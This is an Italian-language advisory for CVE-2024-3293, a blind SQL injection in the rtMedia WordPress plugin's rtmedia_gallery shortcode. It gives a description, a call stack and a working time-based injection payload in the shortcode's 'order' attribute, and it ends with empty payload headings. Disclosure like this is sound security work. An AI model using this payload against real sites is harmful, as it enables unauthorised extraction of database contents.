
CVE-2024-3293 rtMedia per WordPress, BuddyPress e bbPress <= 4.6.18 - SQL Injection autenticata (Collaboratore+) tramite shortcode rtmedia_gallery
rtMedia for WordPress, BuddyPress and bbPress <= 4.6.18 - SQL Injection autenticata (Contributor+) tramite lo shortcode rtmedia_gallery
Descrizione
Il plugin rtMedia for WordPress, BuddyPress and bbPress per WordPress è vulnerabile a SQL Injection cieca tramite lo shortcode rtmedia_gallery in tutte le versioni fino alla 4.6.18 inclusa, a causa di un escaping insufficiente sul parametro fornito dall'utente e della mancanza di una preparazione adeguata della query SQL esistente. Ciò consente a utenti autenticati, con accesso di livello contributor o superiore, di aggiungere query SQL aggiuntive alle query già esistenti che possono essere utilizzate per estrarre informazioni sensibili dal database.
CALL STACK
RTMediaModel->get (\buddypress-media\app\helper\RTMediaModel.php:61)
RTMediaModel->get_media (\buddypress-media\app\helper\RTMediaModel.php:227)
RTMediaQuery->populate_media (\buddypress-media\app\main\routers\query\RTMediaQuery.php:869)
RTMediaQuery->populate_data (\buddypress-media\app\main\routers\query\RTMediaQuery.php:993)
RTMediaQuery->get_data (\buddypress-media\app\main\routers\query\RTMediaQuery.php:1214)
RTMediaQuery->query (\buddypress-media\app\main\routers\query\RTMediaQuery.php:684)
RTMediaQuery->__construct (\buddypress-media\app\main\routers\query\RTMediaQuery.php:184)
RTMediaGalleryShortcode::render (\buddypress-media\app\main\controllers\shortcodes\RTMediaGalleryShortcode.php:271)
Payload:
[rtmedia_gallery global="true" album_id="57" order_by="ratings" order=",media_id,(select 1 from (select sleep(IF(1=1,5,0)))x)"]


Payload vero:

Payload falso:
